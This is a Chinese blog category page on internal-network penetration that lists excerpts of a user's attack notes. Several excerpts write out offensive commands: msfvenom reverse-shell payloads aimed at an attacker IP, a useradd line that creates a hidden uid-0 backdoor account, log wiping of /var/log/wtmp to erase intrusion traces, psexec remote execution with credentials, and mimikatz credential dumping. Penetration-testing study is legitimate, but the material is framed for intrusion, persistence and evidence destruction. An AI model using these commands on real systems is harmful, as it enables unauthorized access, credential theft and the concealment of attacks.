内网渗透
文章平均质量分 73
内网学习
小晓晓晓林
这个作者很懒,什么都没留下…
展开
-
利用NSA的MS17-010漏洞利用工具攻击Windows7
0x01 Download NSA工具包NSA工具包下载攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境:python-2.6.6.msi、pywin32-221.win32-py2.6.exe0x02 修改NSA工具配置文件修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, .原创 2021-02-07 18:11:31 · 1831 阅读 · 0 评论 -
端口转发、映射、代理
端口转发&端口映射在实际渗透过程中,我们成功入侵了目标服务器。接着我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口、内网网站8080端口等等。传统的方法是利用nc、lcx等工具,进行端口转发。0x01 什么是端口转发端口转发就是将一个端口,这个端口可以本机的端口也可以是本机可以访问到的任意主机的端口,转发到任意一台可以访问到的...原创 2020-02-20 16:02:53 · 9363 阅读 · 0 评论 -
ew穿透
EW是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。目前工具提供六种链路状态...原创 2020-02-20 15:32:47 · 2820 阅读 · 1 评论 -
一句话反弹shell
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o isshellWindowsmsfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=121...原创 2020-02-20 15:26:19 · 3063 阅读 · 0 评论 -
内网渗透之信息收集
信息获取总是第一步执行的操作,利用管理员的疏忽或者内网机器的弱口令来发现更多的信息。① 可以使用工具pwdump、mimikatz来抓取管理员hash,配合彩虹表或者在线hash破解,获得管理员的明文密码,这个可以作为自己的密码表,在进行内网其他机器的登陆时尝试。② 查看远程桌面的连接信息,一般通过远程桌面经常连接的机器会在该程序打开时候的下拉菜单中保存,如果管理员选择的是记住密码的话,那...原创 2020-02-20 14:57:53 · 2650 阅读 · 0 评论 -
Linux入侵痕迹清理
Linux入侵痕迹清理环境:Centos7、Kali虚拟机等清除登陆系统成功的记录[root@localhost root]# echo > /var/log/wtmp//此文件默认打开时乱码,可查到ip等信息[root@localhost root]#last//此时即查不到用户登录信息清除之前能看到之前其他机器的登录信息清除登陆系...原创 2020-02-20 14:38:31 · 6872 阅读 · 1 评论 -
Linux持续化后门
Linux权限维持环境:Centos7、Kali虚拟机等1、增加超级用户useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test通过命令创建了test 123456的超级用户2、unix bash远...原创 2020-02-20 10:51:15 · 3336 阅读 · 0 评论 -
Windows入侵痕迹清理
Windows入侵痕迹清理环境:Win10、Win7、Winxp虚拟机等Windows日志包括五个类别:应用程序、安全、Setup、系统、转发事件查看方式1、此电脑-右键管理-Windows日志2、powershell(管理员权限)查看所有日志:Get-winEvent查看应用程序类别下的日志:Get-WinEvent -FilterHashtabl...原创 2020-02-20 10:42:51 · 7753 阅读 · 0 评论 -
Windows持续化后门
Windows权限维持环境:Win10、Win7、Winxp虚拟机等0x01 shift后门windows中有一些辅助功能,能在用户未登录系统之前可以通过组合键来启动它,类似的辅助功能有:C:\Windows\System32\sethc.exe粘滞键,启动快捷键:按五次shift键C:\Windows\System32\utilman.exe设置中心,启动快捷键:W...原创 2020-02-20 10:20:11 · 2187 阅读 · 0 评论 -
Windows远程执行命令
环境:Win10、Win7虚拟机Windows远程命令执行1、psexec.exe远程执行命令psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Admin...原创 2020-01-21 18:16:39 · 10508 阅读 · 0 评论 -
Windows10明文密码抓取
procdump+mimikatz获取win10用户明文密码测试环境:Win10 企业版LTSC 1809工具下载:k8版本的mz64.exe、procdumpv9.0原理:获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进...原创 2020-01-21 17:26:38 · 8783 阅读 · 3 评论 -
几种姿势运行mimikatz
Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的神器,内网渗透中常用mimikatz获取明文密码或者获取hash值来漫游内网。但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。姿势一:powershell...原创 2020-01-21 17:11:50 · 4908 阅读 · 0 评论 -
ssh反向代理实现内网穿透
为了安全起见,公司或者是学校的服务器一般只允许用户在局域网内登录,离开内网环境后就没法登录服务器,特别不方便。但是在某些情况下,我们又想和服务器进行通信的话,就需要借助端口转发来达到目的。 ssh是一种安全的传输协议,通常我们会用在连接服务器上比较多。不过除了这个功能以外,ssh的隧道转发功能更吸引人。ssh常用命令参数 -C 请求压缩所有数据 -f 告诉s...原创 2019-12-23 12:24:09 · 3439 阅读 · 0 评论